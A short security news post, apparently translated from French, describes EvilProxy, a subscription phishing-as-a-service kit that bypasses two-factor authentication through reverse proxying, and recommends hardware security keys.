EvilProxy - Phishing as a service - Alerte 2022

EvilProxy, a service that can bypass MFA

You may not know it, but enabling two-factor authentication on an account will not protect you from all attacks, including phishing attempts. The new service offered by hackers and called EvilProxy is proof of this! But, what is EvilProxy? What’s the point ?

Security researchers at Resecurity have discovered a new service called EvilProxy and posted on various forums on the Dark Web. Used in the context of phishing-type attacks, EvilProxy relies on the operating principles of reverse proxy and cookie injection to circumvent two-factor authentication.

We can say that the session of the victim is “proxified“, because the user, without realizing it, will interact with a malicious proxy server that acts as an intermediary for the target websitewhich will allow EvilProxy to collect the identifiers and the 2FA code entered on the login page. EvilProxy is able to generate phishing links that lead to spoofed pages (copies of the original site) with the aim of compromising credentials and it is compatible with many services like Apple iCloud, Facebook, GoDaddy, GitHub, Google , Dropbox, Instagram, Microsoft, NPM, PyPI, RubyGems, Twitter, Yahoo, etc.

EvilProxy, a PhaaS service available by subscription

EvilProxy is a type service phishing-as-a-service (PhaaS) offered asa subscription for a period of 10, 20 or 31 days. For example, one can get access to this kit for 400 dollars for 1 month, to then obtain access via the TOR network by having previously made the payment: this essential step is carried out via Telegram, after having exchanged with a person at the origin of the EvilProxy project. As saying that access to the tool is subject to validation by cybercriminals. Depending on the options chosen, the price of the subscription can increase, because if you want to tackle Google accounts, the cost can reach 600 dollars per month.

We can also see that beyond targeting services like Facebook, Google or Microsoft, EvilProxy also gives the possibility to target NPM, PyPI, Github accesses, etc… Which can be very powerful! If an attacker gains unauthorized access to a PyPI account, they can inject malicious code into a popular program and infect many people… It’s not only ordinary users who are targeted, but also developers, devops, etc.

Two-factor authentication, yes, but with a security key it’s even better to protect against attacks of this type.



#EvilProxy #service #bypass #MFA

Leave a Comment

Your email address will not be published. Required fields are marked *